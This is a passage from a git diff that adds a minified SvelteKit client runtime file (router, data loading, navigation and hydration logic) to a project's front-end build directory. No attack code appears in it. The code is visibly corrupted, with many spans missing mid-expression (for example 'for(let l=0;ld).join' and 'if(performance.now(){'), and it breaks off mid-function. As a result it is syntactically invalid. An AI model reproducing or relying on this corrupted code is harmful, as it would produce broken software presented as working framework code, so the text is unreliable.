h=i.length;for(;h;)r=r*33^i[--h]}else throw new TypeError("value must be a string or TypedArray");return(r>>>0).toString(36)}const Ke=window.fetch;window.fetch=(t,r)=>((t instanceof Request?t.method:(r==null?void 0:r.method)||"GET")!=="GET"&&ae.delete(Se(t)),Ke(t,r));const ae=new Map;function ct(t,r){const f=Se(t,r),i=document.querySelector(f);if(i!=null&&i.textContent){const{body:h,...u}=JSON.parse(i.textContent),E=i.getAttribute("data-ttl");return E&&ae.set(f,{body:h,init:u,ttl:1e3*Number(E)}),Promise.resolve(new Response(h,u))}return window.fetch(t,r)}function lt(t,r,f){if(ae.size>0){const i=Se(t,f),h=ae.get(i);if(h){if(performance.now(){const h=/^\[\.\.\.(\w+)(?:=(\w+))?\]$/.exec(i);if(h)return r.push({name:h[1],matcher:h[2],optional:!1,rest:!0,chained:!0}),"(?:/(.*))?";const u=/^\[\[(\w+)(?:=(\w+))?\]\]$/.exec(i);if(u)return r.push({name:u[1],matcher:u[2],optional:!0,rest:!1,chained:!0}),"(?:/([^/]+))?";if(!i)return;const E=i.split(/\[(.+?)\](?!\])/);return"/"+E.map((g,m)=>{if(m%2){if(g.startsWith("x+"))return ve(String.fromCharCode(parseInt(g.slice(2),16)));if(g.startsWith("u+"))return ve(String.fromCharCode(...g.slice(2).split("-").map(U=>parseInt(U,16))));const d=ft.exec(g);if(!d)throw new Error(`Invalid param: ${g}. Params and matcher names can only have underscores and alphanumeric characters.`);const[,j,T,R,C]=d;return r.push({name:R,matcher:C,optional:!!j,rest:!!T,chained:T?m===1&&E[0]==="":!1}),T?"(.*?)":j?"([^/]*)?":"([^/]+?)"}return ve(g)}).join("")}).join("")}/?$`),params:r}}function dt(t){return!/^\([^)]+\)$/.test(t)}function pt(t){return t.slice(1).split("/").filter(dt)}function ht(t,r,f){const i={},h=t.slice(1),u=h.filter(l=>l!==void 0);let E=0;for(let l=0;ld).join("/"),E=0),m===void 0){g.rest&&(i[g.name]="");continue}if(!g.matcher||f[g.matcher](m)){i[g.name]=m;const d=r[l+1],j=h[l+1];d&&!d.rest&&d.optional&&j&&g.chained&&(E=0),!d&&!j&&Object.keys(i).length===u.length&&(E=0);continue}if(g.optional&&g.chained){E++;continue}return}if(!E)return i}function ve(t){return t.normalize().replace(/[[\]]/g,"\\$&").replace(/%/g,"%25").replace(/\//g,"%2[Ff]").replace(/\?/g,"%3[Ff]").replace(/#/g,"%23").replace(/[.*+?^${}()|\\]/g,"\\$&")}function gt({nodes:t,server_loads:r,dictionary:f,matchers:i}){const h=new Set(r);return Object.entries(f).map(([l,[g,m,d]])=>{const{pattern:j,params:T}=ut(l),R={id:l,exec:C=>{const U=j.exec(C);if(U)return ht(U,T,i)},errors:[1,...d||[]].map(C=>t[C]),layouts:[0,...m||[]].map(E),leaf:u(g)};return R.errors.length=R.layouts.length=Math.max(R.errors.length,R.layouts.length),R});function u(l){const g=l<0;return g&&(l=~l),[g,t[l]]}function E(l){return l===void 0?l:[h.has(l),t[l]]}}function ze(t){try{return JSON.parse(sessionStorage[t])}catch{}}function qe(t,r){const f=JSON.stringify(r);try{sessionStorage[t]=f}catch{}}const mt=-1,wt=-2,_t=-3,yt=-4,vt=-5,bt=-6;function Et(t,r){if(typeof t=="number")return h(t,!0);if(!Array.isArray(t)||t.length===0)throw new Error("Invalid input");const f=t,i=Array(f.length);function h(u,E=!1){if(u===mt)return;if(u===_t)return NaN;if(u===yt)return 1/0;if(u===vt)return-1/0;if(u===bt)return-0;if(E)throw new Error("Invalid input");if(u in i)return i[u];const l=f[u];if(!l||typeof l!="object")i[u]=l;else if(Array.isArray(l))if(typeof l[0]=="string"){const g=l[0],m=r==null?void 0:r[g];if(m)return i[u]=m(h(l[1]));switch(g){case"Date":i[u]=new Date(l[1]);break;case"Set":const d=new Set;i[u]=d;for(let R=1;Rr!=null)}const We=new Set(["load","prerender","csr","ssr","trailingSlash","config"]);[...We];const kt=new Set([...We]);[...kt];async function Rt(t){var r;for(const f in t)if(typeof((r=t[f])==null?void 0:r.then)=="function")return Object.fromEntries(await Promise.all(Object.entries(t).map(async([i,h])=>[i,await h])));return t}class ne{constructor(r,f){this.status=r,typeof f=="string"?this.body={message:f}:f?this.body=f:this.body={message:`Error: ${r}`}}toString(){return JSON.stringify(this.body)}}class Fe{constructor(r,f){this.status=r,this.location=f}}const At="x-sveltekit-invalidated",It="x-sveltekit-trailing-slash",J=ze(Ge)??{},ee=ze(Je)??{};function be(t){J[t]=te()}function K(t){return location.href=t.href,new Promise(()=>{})}function Lt(t,r){var Ne;const f=gt(t),i=t.nodes[0],h=t.nodes[1];i(),h();const u=document.documentElement,E=[],l=[];let g=null;const m={before_navigate:[],on_navigate:[],after_navigate:[]};let d={branch:[],error:null,url:null},j=!1,T=!1,R=!0,C=!1,U=!1,D=!1,z=!1,q,x=(Ne=history.state)==null?void 0:Ne[V];x||(x=Date.now(),history.replaceState({...history.state,[V]:x},"",location.href));const fe=J[x];fe&&(history.scrollRestoration="manual",scrollTo(fe.x,fe.y));let F,W,Y;async function ke(){if(Y=Y||Promise.resolve(),await Y,!Y)return;Y=null;const e=new URL(location.href),s=Z(e,!0);g=null;const n=W={},o=s&&await pe(s);if(n===W&&o){if(o.type==="redirect")return re(new URL(o.location,e).href,{},1,n);o.props.page!==void 0&&(F=o.props.page),q.$set(o.props)}}function Re(e){l.some(s=>s==null?void 0:s.snapshot)&&(ee[e]=l.map(s=>{var n;return(n=s==null?void 0:s.snapshot)==null?void 0:n.capture()}))}function Ae(e){var s;(s=ee[e])==null||s.forEach((n,o)=>{var a,c;(c=(a=l[o])==null?void 0:a.snapshot)==null||c.restore(n)})}function Ie(){be(x),qe(Ge,J),Re(x),qe(Je,ee)}async function re(e,{noScroll:s=!1,replaceState:n=!1,keepFocus:o=!1,state:a={},invalidateAll:c=!1},p,v){return typeof e=="string"&&(e=new URL(e,De(document))),ce({url:e,scroll:s?te():null,keepfocus:o,redirect_count:p,details:{state:a,replaceState:n},nav_token:v,accepted:()=>{c&&(z=!0)},blocked:()=>{},type:"goto"})}async function Le(e){return g={id:e.id,promise:pe(e).then(s=>(s.type==="loaded"&&s.state.error&&(g=null),s))},g.promise}async function oe(...e){const n=f.filter(o=>e.some(a=>o.exec(a))).map(o=>Promise.all([...o.layouts,o.leaf].map(a=>a==null?void 0:a[1]())));await Promise.all(n)}function Pe(e){var o;d=e.state;const s=document.querySelector("style[data-sveltekit]");s&&s.remove(),F=e.props.page,q=new t.root({target:r,props:{...e.props,stores:H,components:l},hydrate:!0}),Ae(x);const n={from:null,to:{params:d.params,route:{id:((o=d.route)==null?void 0:o.id)??null},url:new URL(location.href)},willUnload:!1,type:"enter",complete:Promise.resolve()};m.after_navigate.forEach(a=>a(n)),T=!0}async function X({url:e,params:s,branch:n,status:o,error:a,route:c,form:p}){let v="never";for(const _ of n)(_==null?void 0:_.slash)!==void 0&&(v=_.slash);e.pathname=Qe(e.pathname,v),e.search=e.search;const b={type:"loaded",state:{url:e,params:s,branch:n,error:a,route:c},props:{constructors:St(n).map(_=>_.node.component)}};p!==void 0&&(b.props.form=p);let y={},L=!F,A=0;for(let _=0;_(v.route=!0,w[O])}),params:new Proxy(o,{get:(w,O)=>(v.params.add(O),w[O])}),data:(c==null?void 0:c.data)??null,url:at(n,()=>{v.url=!0}),async fetch(w,O){let N;w instanceof Request?(N=w.url,O={body:w.method==="GET"||w.method==="HEAD"?void 0:await w.blob(),cache:w.cache,credentials:w.credentials,headers:w.headers,integrity:w.integrity,keepalive:w.keepalive,method:w.method,mode:w.mode,redirect:w.redirect,referrer:w.referrer,referrerPolicy:w.referrerPolicy,signal:w.signal,...O}):N=w;const M=new URL(N,n);return P(M.href),M.origin===n.origin&&(N=M.href.slice(n.origin.length)),T?lt(N,M.href,O):ct(N,O)},setHeaders:()=>{},depends:P,parent(){return v.parent=!0,s()}};p=await b.universal.load.call(null,_)??null,p=p?await Rt(p):null}return{node:b,loader:e,server:c,universal:(L=b.universal)!=null&&L.load?{type:"data",data:p,uses:v}:null,data:p??(c==null?void 0:c.data)??null,slash:((A=b.universal)==null?void 0:A.trailingSlash)??(c==null?void 0:c.slash)}}function Oe(e,s,n,o,a){if(z)return!0;if(!o)return!1;if(o.parent&&e||o.route&&s||o.url&&n)return!0;for(const c of o.params)if(a[c]!==d.params[c])return!0;for(const c of o.dependencies)if(E.some(p=>p(new URL(c))))return!0;return!1}function de(e,s){return(e==null?void 0:e.type)==="data"?e:(e==null?void 0:e.type)==="skip"?s??null:null}async function pe({id:e,invalidating:s,url:n,params:o,route:a}){if((g==null?void 0:g.id)===e)return g.promise;const{errors:c,layouts:p,leaf:v}=a,b=[...p,v];c.forEach(S=>S==null?void 0:S().catch(()=>{})),b.forEach(S=>S==null?void 0:S[1]().catch(()=>{}));let y=null;const L=d.url?e!==d.url.pathname+d.url.search:!1,A=d.route?a.id!==d.route.id:!1;let P=!1;const _=b.map((S,I)=>{var B;const k=d.branch[I],$=!!(S!=null&&S[0])&&((k==null?void 0:k.loader)!==S[1]||Oe(P,A,L,(B=k.server)==null?void 0:B.uses,o));return $&&(P=!0),$});if(_.some(Boolean)){try{y=await He(n,_)}catch(S){return ie({status:S instanceof ne?S.status:500,error:await Q(S,{url:n,params:o,route:{id:a.id}}),url:n,route:a})}if(y.type==="redirect")return y}const w=y==null?void 0:y.nodes;let O=!1;const N=b.map(async(S,I)=>{var he;if(!S)return;const k=d.branch[I],$=w==null?void 0:w[I];if((!$||$.type==="skip")&&S[1]===(k==null?void 0:k.loader)&&!Oe(O,A,L,(he=k.universal)==null?void 0:he.uses,o))return k;if(O=!0,($==null?void 0:$.type)==="error")throw $;return ue({loader:S[1],url:n,params:o,route:a,parent:async()=>{var Te;const $e={};for(let ge=0;ge{});const M=[];for(let S=0;SPromise.resolve({}),server_data_node:de(c)}),b={node:await h(),loader:h,universal:null,server:null,data:null};return await X({url:n,params:a,branch:[v,b],status:e,error:s,route:null})}function Z(e,s){if(ye(e,G))return;const n=se(e);for(const o of f){const a=o.exec(n);if(a)return{id:e.pathname+e.search,invalidating:s,route:o,params:tt(a),url:e}}}function se(e){return et(e.pathname.slice(G.length)||"/")}function Ue({url:e,type:s,intent:n,delta:o}){let a=!1;const c=Be(d,n,e,s);o!==void 0&&(c.navigation.delta=o);const p={...c.navigation,cancel:()=>{a=!0,c.reject(new Error("navigation was cancelled"))}};return U||m.before_navigate.forEach(v=>v(p)),a?null:c}async function ce({url:e,scroll:s,keepfocus:n,redirect_count:o,details:a,type:c,delta:p,nav_token:v={},accepted:b,blocked:y}){var N,M,S;const L=Z(e,!1),A=Ue({url:e,type:c,delta:p,intent:L});if(!A){y();return}const P=x;b(),U=!0,T&&H.navigating.set(A.navigation),W=v;let _=L&&await pe(L);if(!_){if(ye(e,G))return await K(e);_=await je(e,{id:null},await Q(new Error(`Not found: ${e.pathname}`),{url:e,params:{},route:{id:null}}),404)}if(e=(L==null?void 0:L.url)||e,W!==v)return A.reject(new Error("navigation was aborted")),!1;if(_.type==="redirect")if(o>=20)_=await ie({status:500,error:await Q(new Error("Redirect loop"),{url:e,params:{},route:{id:null}}),url:e,route:{id:null}});else return re(new URL(_.location,e).href,{},o+1,v),!1;else((N=_.props.page)==null?void 0:N.status)>=400&&await H.updated.check()&&await K(e);if(E.length=0,z=!1,C=!0,be(P),Re(P),(M=_.props.page)!=null&&M.url&&_.props.page.url.pathname!==e.pathname&&(e.pathname=(S=_.props.page)==null?void 0:S.url.pathname),a){const I=a.replaceState?0:1;if(a.state[V]=x+=I,history[a.replaceState?"replaceState":"pushState"](a.state,"",e),!a.replaceState){let k=x+1;for(;ee[k]||J[k];)delete ee[k],delete J[k],k+=1}}if(g=null,T){d=_.state,_.props.page&&(_.props.page.url=e);const I=(await Promise.all(m.on_navigate.map(k=>k(A.navigation)))).filter(k=>typeof k=="function");if(I.length>0){let k=function(){m.after_navigate=m.after_navigate.filter($=>!I.includes($))};I.push(k),m.after_navigate.push(...I)}q.$set(_.props)}else Pe(_);const{activeElement:w}=document;if(await we(),R){const I=e.hash&&document.getElementById(decodeURIComponent(e.hash.slice(1)));s?scrollTo(s.x,s.y):I?I.scrollIntoView():scrollTo(0,0)}const O=document.activeElement!==w&&document.activeElement!==document.body;!n&&!O&&Ee(),R=!0,_.props.page&&(F=_.props.page),U=!1,c==="popstate"&&Ae(x),A.fulfil(void 0),m.after_navigate.forEach(I=>I(A.navigation)),H.navigating.set(null),C=!1}async function je(e,s,n,o){return e.origin===Me&&e.pathname===location.pathname&&!j?await ie({status:o,error:n,url:e,route:s}):await K(e)}function Xe(){let e;u.addEventListener("mousemove",c=>{const p=c.target;clearTimeout(e),e=setTimeout(()=>{o(p,2)},20)});function s(c){o(c.composedPath()[0],1)}u.addEventListener("mousedown",s),u.addEventListener("touchstart",s,{passive:!0});const n=new IntersectionObserver(c=>{for(const p of c)p.isIntersecting&&(oe(se(new URL(p.target.href))),n.unobserve(p.target))},{threshold:0});function o(c,p){const v=Ce(c,u);if(!v)return;const{url:b,external:y,download:L}=_e(v,G);if(y||L)return;const A=le(v);if(!A.reload)if(p<=A.preload_data){const P=Z(b,!1);P&&Le(P)}else p<=A.preload_code&&oe(se(b))}function a(){n.disconnect();for(const c of u.querySelectorAll("a")){const{url:p,external:v,download:b}=_e(c,G);if(v||b)continue;const y=le(c);y.reload||(y.preload_code===Ve.viewport&&n.observe(c),y.preload_code===Ve.eager&&oe(se(p)))}}m.after_navigate.push(a),a()}function Q(e,s){return e instanceof ne?e.body:t.hooks.handleError({error:e,event:s})??{message:s.route.id!=null?"Internal Error":"Not Found"}}return{after_navigate:e=>{me(()=>(m.after_navigate.push(e),()=>{const s=m.after_navigate.indexOf(e);m.after_navigate.splice(s,1)}))},before_navigate:e=>{me(()=>(m.before_navigate.push(e),()=>{const s=m.before_navigate.indexOf(e);m.before_navigate.splice(s,1)}))},on_navigate:e=>{me(()=>(m.on_navigate.push(e),()=>{const s=m.on_navigate.indexOf(e);m.on_navigate.splice(s,1)}))},disable_scroll_handling:()=>{(C||!T)&&(R=!1)},goto:(e,s={})=>re(e,s,0),invalidate:e=>{if(typeof e=="function")E.push(e);else{const{href:s}=new URL(e,location.href);E.push(n=>n.href===s)}return ke()},invalidate_all:()=>(z=!0,ke()),preload_data:async e=>{const s=new URL(e,De(document)),n=Z(s,!1);if(!n)throw new Error(`Attempted to preload a URL that does not belong to this app: ${s}`);await Le(n)},preload_code:oe,apply_action:async e=>{if(e.type==="error"){const s=new URL(location.href),{branch:n,route:o}=d;if(!o)return;const a=await xe(d.branch.length,n,o.errors);if(a){const c=await X({url:s,params:d.params,branch:n.slice(0,a.idx).concat(a.node),status:e.status??500,error:e.error,route:o});d=c.state,q.$set(c.props),we().then(Ee)}}else e.type==="redirect"?re(e.location,{invalidateAll:!0},0):(q.$set({form:null,page:{...F,form:e.data,status:e.status}}),await we(),q.$set({form:e.data}),e.type==="success"&&Ee())},_start_router:()=>{var s;history.scrollRestoration="manual",addEventListener("beforeunload",n=>{let o=!1;if(Ie(),!U){const a=Be(d,void 0,null,"leave"),c={...a.navigation,cancel:()=>{o=!0,a.reject(new Error("navigation was cancelled"))}};m.before_navigate.forEach(p=>p(c))}o?(n.preventDefault(),n.returnValue=""):history.scrollRestoration="auto"}),addEventListener("visibilitychange",()=>{document.visibilityState==="hidden"&&Ie()}),(s=navigator.connection)!=null&&s.saveData||Xe(),u.addEventListener("click",n=>{var P;if(n.button||n.which!==1||n.metaKey||n.ctrlKey||n.shiftKey||n.altKey||n.defaultPrevented)return;const o=Ce(n.composedPath()[0],u);if(!o)return;const{url:a,external:c,target:p,download:v}=_e(o,G);if(!a)return;if(p==="_parent"||p==="_top"){if(window.parent!==window)return}else if(p&&p!=="_self")return;const b=le(o);if(!(o instanceof SVGAElement)&&a.protocol!==location.protocol&&!(a.protocol==="https:"||a.protocol==="http:")||v)return;if(c||b.reload){Ue({url:a,type:"link"})?U=!0:n.preventDefault();return}const[L,A]=a.href.split("#");if(A!==void 0&&L===location.href.split("#")[0]){if(d.url.hash===a.hash){n.preventDefault(),(P=o.ownerDocument.getElementById(A))==null||P.scrollIntoView();return}if(D=!0,be(x),e(a),!b.replace_state)return;D=!1,n.preventDefault()}ce({url:a,scroll:b.noscroll?te():null,keepfocus:b.keep_focus??!1,redirect_count:0,details:{state:{},replaceState:b.replace_state??a.href===location.href},accepted:()=>n.preventDefault(),blocked:()=>n.preventDefault(),type:"link"})}),u.addEventListener("submit",n=>{if(n.defaultPrevented)return;const o=HTMLFormElement.prototype.cloneNode.call(n.target),a=n.submitter;if(((a==null?void 0:a.formMethod)||o.method)!=="get")return;const p=new URL((a==null?void 0:a.hasAttribute("formaction"))&&(a==null?void 0:a.formAction)||o.action);if(ye(p,G))return;const v=n.target,{keep_focus:b,noscroll:y,reload:L,replace_state:A}=le(v);if(L)return;n.preventDefault(),n.stopPropagation();const P=new FormData(v),_=a==null?void 0:a.getAttribute("name");_&&P.append(_,(a==null?void 0:a.getAttribute("value"))??""),p.search=new URLSearchParams(P).toString(),ce({url:p,scroll:y?te():null,keepfocus:b??!1,redirect_count:0,details:{state:{},replaceState:A??p.href===location.href},nav_token:{},accepted:()=>{},blocked:()=>{},type:"form"})}),addEventListener("popstate",async n=>{var o;if(W={},(o=n.state)!=null&&o[V]){if(n.state[V]===x)return;const a=J[n.state[V]],c=new URL(location.href);if(d.url.href.split("#")[0]===location.href.split("#")[0]){e(c),J[x]=te(),x=n.state[V],scrollTo(a.x,a.y);return}const p=n.state[V]-x;await ce({url:c,scroll:a,keepfocus:!1,redirect_count:0,details:null,accepted:()=>{x=n.state[V]},blocked:()=>{history.go(-p)},type:"popstate",delta:p,nav_token:W})}else if(!D){const a=new URL(location.href);e(a)}}),addEventListener("hashchange",()=>{D&&(D=!1,history.replaceState({...history.state,[V]:++x},"",location.href))});for(const n of document.querySelectorAll("link"))n.rel==="icon"&&(n.href=n.href);addEventListener("pageshow",n=>{n.persisted&&H.navigating.set(null)});function e(n){d.url=n,H.page.set({...F,url:n}),H.page.notify()}},_hydrate:async({status:e=200,error:s,node_ids:n,params:o,route:a,data:c,form:p})=>{j=!0;const v=new URL(location.href);({params:o={},route:a={id:null}}=Z(v,!1)||{});let b;try{const y=n.map(async(P,_)=>{const w=c[_];return w!=null&&w.uses&&(w.uses=Ye(w.uses)),ue({loader:t.nodes[P],url:v,params:o,route:a,parent:async()=>{const O={};for(let N=0;N<_;N+=1)Object.assign(O,(await y[N]).data);return O},server_data_node:de(w)})}),L=await Promise.all(y),A=f.find(({id:P})=>P===a.id);if(A){const P=A.layouts;for(let _=0;_u?"1":"0").join(""));const i=await Ke(f.href);if((h=i.headers.get("content-type"))!=null&&h.includes("text/html")&&await K(t),!i.ok)throw new ne(i.status,await i.json());return new Promise(async u=>{var j;const E=new Map,l=i.body.getReader(),g=new TextDecoder;function m(T){return Et(T,{Promise:R=>new Promise((C,U)=>{E.set(R,{fulfil:C,reject:U})})})}let d="";for(;;){const{done:T,value:R}=await l.read();if(T&&!d)break;for(d+=!R&&d?`
+`:g.decode(R);;){const C=d.indexOf(`
+`);if(C===-1)break;const U=JSON.parse(d.slice(0,C));if(d=d.slice(C+1),U.type==="redirect")return u(U);if(U.type==="data")(j=U.nodes)==null||j.forEach(D=>{(D==null?void 0:D.type)==="data"&&(D.uses=Ye(D.uses),D.data=m(D.data))}),u(U);else if(U.type==="chunk"){const{id:D,data:z,error:q}=U,x=E.get(D);E.delete(D),q?x.reject(m(q)):x.fulfil(m(z))}}}})}function Ye(t){return{dependencies:new Set((t==null?void 0:t.dependencies)??[]),params:new Set((t==null?void 0:t.params)??[]),parent:!!(t!=null&&t.parent),route:!!(t!=null&&t.route),url:!!(t!=null&&t.url)}}function Ee(){const t=document.querySelector("[autofocus]");if(t)t.focus();else{const r=document.body,f=r.getAttribute("tabindex");r.tabIndex=-1,r.focus({preventScroll:!0,focusVisible:!1}),f!==null?r.setAttribute("tabindex",f):r.removeAttribute("tabindex");const i=getSelection();if(i&&i.type!=="None"){const h=[];for(let u=0;u{if(i.rangeCount===h.length){for(let u=0;u{h=d,u=j});return E.catch(()=>{}),{navigation:{from:{params:t.params,route:{id:((g=t.route)==null?void 0:g.id)??null},url:t.url},to:f&&{params:(r==null?void 0:r.params)??null,route:{id:((m=r==null?void 0:r.route)==null?void 0:m.id)??null},url:f},willUnload:!r,type:i,complete:E},fulfil:h,reject:u}}async function xt(t,r,f){const i=Lt(t,r);Ze({client:i}),f?await i._hydrate(f):i.goto(location.href,{replaceState:!0}),i._start_router()}export{xt as start};
diff --git a/services/explorers/front/build/_app/immutable/entry/start.deee71d0.js b/services/explorers/front/build/_app/immutable/entry/start.deee71d0.js
new file mode 100644
index 0000000..53f87e9
--- /dev/null
+++ b/services/explorers/front/build/_app/immutable/entry/start.deee71d0.js
@@ -0,0 +1,3 @@
+import{o as me,t as we}from"../chunks/scheduler.1f572272.js";import{S as Ge,a as Je,I as V,g as De,f as Ce,b as _e,c as le,s as te,i as ye,d as H,o as Me,e as G,P as Ve,h as Ze}from"../chunks/singletons.27fcd387.js";function Qe(t,r){return t==="/"||r==="ignore"?t:r==="never"?t.endsWith("/")?t.slice(0,-1):t:r==="always"&&!t.endsWith("/")?t+"/":t}function et(t){return t.split("%25").map(decodeURI).join("%25")}function tt(t){for(const r in t)t[r]=decodeURIComponent(t[r]);return t}const nt=["href","pathname","search","searchParams","toString","toJSON"];function at(t,r){const f=new URL(t);for(const i of nt)Object.defineProperty(f,i,{get(){return r(),t[i]},enumerable:!0,configurable:!0});return rt(f),f}function rt(t){Object.defineProperty(t,"hash",{get(){throw new Error("Cannot access event.url.hash. Consider using `$page.url.hash` inside a component instead")}})}const ot="/__data.json";function it(t){return t.replace(/\/$/,"")+ot}function st(...t){let r=5381;for(const f of t)if(typeof f=="string"){let i=f.length;for(;i;)r=r*33^f.charCodeAt(--i)}else if(ArrayBuffer.isView(f)){const i=new Uint8Array(f.buffer,f.byteOffset,f.byteLength);let h=i.length;for(;h;)r=r*33^i[--h]}else throw new TypeError("value must be a string or TypedArray");return(r>>>0).toString(36)}const Ke=window.fetch;window.fetch=(t,r)=>((t instanceof Request?t.method:(r==null?void 0:r.method)||"GET")!=="GET"&&ae.delete(Se(t)),Ke(t,r));const ae=new Map;function ct(t,r){const f=Se(t,r),i=document.querySelector(f);if(i!=null&&i.textContent){const{body:h,...u}=JSON.parse(i.textContent),E=i.getAttribute("data-ttl");return E&&ae.set(f,{body:h,init:u,ttl:1e3*Number(E)}),Promise.resolve(new Response(h,u))}return window.fetch(t,r)}function lt(t,r,f){if(ae.size>0){const i=Se(t,f),h=ae.get(i);if(h){if(performance.now(){const h=/^\[\.\.\.(\w+)(?:=(\w+))?\]$/.exec(i);if(h)return r.push({name:h[1],matcher:h[2],optional:!1,rest:!0,chained:!0}),"(?:/(.*))?";const u=/^\[\[(\w+)(?:=(\w+))?\]\]$/.exec(i);if(u)return r.push({name:u[1],matcher:u[2],optional:!0,rest:!1,chained:!0}),"(?:/([^/]+))?";if(!i)return;const E=i.split(/\[(.+?)\](?!\])/);return"/"+E.map((g,m)=>{if(m%2){if(g.startsWith("x+"))return ve(String.fromCharCode(parseInt(g.slice(2),16)));if(g.startsWith("u+"))return ve(String.fromCharCode(...g.slice(2).split("-").map(U=>parseInt(U,16))));const d=ft.exec(g);if(!d)throw new Error(`Invalid param: ${g}. Params and matcher names can only have underscores and alphanumeric characters.`);const[,j,T,R,C]=d;return r.push({name:R,matcher:C,optional:!!j,rest:!!T,chained:T?m===1&&E[0]==="":!1}),T?"(.*?)":j?"([^/]*)?":"([^/]+?)"}return ve(g)}).join("")}).join("")}/?$`),params:r}}function dt(t){return!/^\([^)]+\)$/.test(t)}function pt(t){return t.slice(1).split("/").filter(dt)}function ht(t,r,f){const i={},h=t.slice(1),u=h.filter(l=>l!==void 0);let E=0;for(let l=0;ld).join("/"),E=0),m===void 0){g.rest&&(i[g.name]="");continue}if(!g.matcher||f[g.matcher](m)){i[g.name]=m;const d=r[l+1],j=h[l+1];d&&!d.rest&&d.optional&&j&&g.chained&&(E=0),!d&&!j&&Object.keys(i).length===u.length&&(E=0);continue}if(g.optional&&g.chained){E++;continue}return}if(!E)return i}function ve(t){return t.normalize().replace(/[[\]]/g,"\\$&").replace(/%/g,"%25").replace(/\//g,"%2[Ff]").replace(/\?/g,"%3[Ff]").replace(/#/g,"%23").replace(/[.*+?^${}()|\\]/g,"\\$&")}function gt({nodes:t,server_loads:r,dictionary:f,matchers:i}){const h=new Set(r);return Object.entries(f).map(([l,[g,m,d]])=>{const{pattern:j,params:T}=ut(l),R={id:l,exec:C=>{const U=j.exec(C);if(U)return ht(U,T,i)},errors:[1,...d||[]].map(C=>t[C]),layouts:[0,...m||[]].map(E),leaf:u(g)};return R.errors.length=R.layouts.length=Math.max(R.errors.length,R.layouts.length),R});function u(l){const g=l<0;return g&&(l=~l),[g,t[l]]}function E(l){return l===void 0?l:[h.has(l),t[l]]}}function ze(t){try{return JSON.parse(sessionStorage[t])}catch{}}function qe(t,r){const f=JSON.stringify(r);try{sessionStorage[t]=f}catch{}}const mt=-1,wt=-2,_t=-3,yt=-4,vt=-5,bt=-6;function Et(t,r){if(typeof t=="number")return h(t,!0);if(!Array.isArray(t)||t.length===0)throw new Error("Invalid input");const f=t,i=Array(f.length);function h(u,E=!1){if(u===mt)return;if(u===_t)return NaN;if(u===yt)return 1/0;if(u===vt)return-1/0;if(u===bt)return-0;if(E)throw new Error("Invalid input");if(u in i)return i[u];const l=f[u];if(!l||typeof l!="object")i[u]=l;else if(Array.isArray(l))if(typeof l[0]=="string"){const g=l[0],m=r==null?void 0:r[g];if(m)return i[u]=m(h(l[1]));switch(g){case"Date":i[u]=new Date(l[1]);break;case"Set":const d=new Set;i[u]=d;for(let R=1;Rr!=null)}const We=new Set(["load","prerender","csr","ssr","trailingSlash","config"]);[...We];const kt=new Set([...We]);[...kt];async function Rt(t){var r;for(const f in t)if(typeof((r=t[f])==null?void 0:r.then)=="function")return Object.fromEntries(await Promise.all(Object.entries(t).map(async([i,h])=>[i,await h])));return t}class ne{constructor(r,f){this.status=r,typeof f=="string"?this.body={message:f}:f?this.body=f:this.body={message:`Error: ${r}`}}toString(){return JSON.stringify(this.body)}}class Fe{constructor(r,f){this.status=r,this.location=f}}const At="x-sveltekit-invalidated",It="x-sveltekit-trailing-slash",J=ze(Ge)??{},ee=ze(Je)??{};function be(t){J[t]=te()}function K(t){return location.href=t.href,new Promise(()=>{})}function Lt(t,r){var Ne;const f=gt(t),i=t.nodes[0],h=t.nodes[1];i(),h();const u=document.documentElement,E=[],l=[];let g=null;const m={before_navigate:[],on_navigate:[],after_navigate:[]};let d={branch:[],error:null,url:null},j=!1,T=!1,R=!0,C=!1,U=!1,D=!1,z=!1,q,x=(Ne=history.state)==null?void 0:Ne[V];x||(x=Date.now(),history.replaceState({...history.state,[V]:x},"",location.href));const fe=J[x];fe&&(history.scrollRestoration="manual",scrollTo(fe.x,fe.y));let F,W,Y;async function ke(){if(Y=Y||Promise.resolve(),await Y,!Y)return;Y=null;const e=new URL(location.href),s=Z(e,!0);g=null;const n=W={},o=s&&await pe(s);if(n===W&&o){if(o.type==="redirect")return re(new URL(o.location,e).href,{},1,n);o.props.page!==void 0&&(F=o.props.page),q.$set(o.props)}}function Re(e){l.some(s=>s==null?void 0:s.snapshot)&&(ee[e]=l.map(s=>{var n;return(n=s==null?void 0:s.snapshot)==null?void 0:n.capture()}))}function Ae(e){var s;(s=ee[e])==null||s.forEach((n,o)=>{var a,c;(c=(a=l[o])==null?void 0:a.snapshot)==null||c.restore(n)})}function Ie(){be(x),qe(Ge,J),Re(x),qe(Je,ee)}async function re(e,{noScroll:s=!1,replaceState:n=!1,keepFocus:o=!1,state:a={},invalidateAll:c=!1},p,v){return typeof e=="string"&&(e=new URL(e,De(document))),ce({url:e,scroll:s?te():null,keepfocus:o,redirect_count:p,details:{state:a,replaceState:n},nav_token:v,accepted:()=>{c&&(z=!0)},blocked:()=>{},type:"goto"})}async function Le(e){return g={id:e.id,promise:pe(e).then(s=>(s.type==="loaded"&&s.state.error&&(g=null),s))},g.promise}async function oe(...e){const n=f.filter(o=>e.some(a=>o.exec(a))).map(o=>Promise.all([...o.layouts,o.leaf].map(a=>a==null?void 0:a[1]())));await Promise.all(n)}function Pe(e){var o;d=e.state;const s=document.querySelector("style[data-sveltekit]");s&&s.remove(),F=e.props.page,q=new t.root({target:r,props:{...e.props,stores:H,components:l},hydrate:!0}),Ae(x);const n={from:null,to:{params:d.params,route:{id:((o=d.route)==null?void 0:o.id)??null},url:new URL(location.href)},willUnload:!1,type:"enter",complete:Promise.resolve()};m.after_navigate.forEach(a=>a(n)),T=!0}async function X({url:e,params:s,branch:n,status:o,error:a,route:c,form:p}){let v="never";for(const _ of n)(_==null?void 0:_.slash)!==void 0&&(v=_.slash);e.pathname=Qe(e.pathname,v),e.search=e.search;const b={type:"loaded",state:{url:e,params:s,branch:n,error:a,route:c},props:{constructors:St(n).map(_=>_.node.component)}};p!==void 0&&(b.props.form=p);let y={},L=!F,A=0;for(let _=0;_(v.route=!0,w[O])}),params:new Proxy(o,{get:(w,O)=>(v.params.add(O),w[O])}),data:(c==null?void 0:c.data)??null,url:at(n,()=>{v.url=!0}),async fetch(w,O){let N;w instanceof Request?(N=w.url,O={body:w.method==="GET"||w.method==="HEAD"?void 0:await w.blob(),cache:w.cache,credentials:w.credentials,headers:w.headers,integrity:w.integrity,keepalive:w.keepalive,method:w.method,mode:w.mode,redirect:w.redirect,referrer:w.referrer,referrerPolicy:w.referrerPolicy,signal:w.signal,...O}):N=w;const M=new URL(N,n);return 